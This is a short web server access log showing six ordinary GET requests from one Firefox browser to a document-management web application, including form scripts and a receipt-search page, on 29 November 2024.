178.115.42.220 - - [29/Nov/2024:10:17:34 +0100] "GET /gui/javascript/form_form.js?1732871854 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [29/Nov/2024:10:17:34 +0100] "GET /entry.php?id=10889&document_id=& HTTP/1.1" 200 1508 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [29/Nov/2024:10:17:36 +0100] "GET /entry.php?id=11237&type=10665 HTTP/1.1" 200 276 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [29/Nov/2024:10:17:36 +0100] "GET /entry.php?id=11238&mode=document&form=10665& HTTP/1.1" 200 3302 "http://hausegger.activities.at/entry.php?id=11237&type=10665" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [29/Nov/2024:10:17:36 +0100] "GET /entry.php?id=10676&&title=Belegsuche HTTP/1.1" 200 1390 "http://hausegger.activities.at/entry.php?id=11237&type=10665" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [29/Nov/2024:10:17:36 +0100] "GET /gui/javascript/form_bu_document_workflow.js?1732871856 HTTP/1.1" 200 4900 "http://hausegger.activities.at/entry.php?id=11238&mode=document&form=10665&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
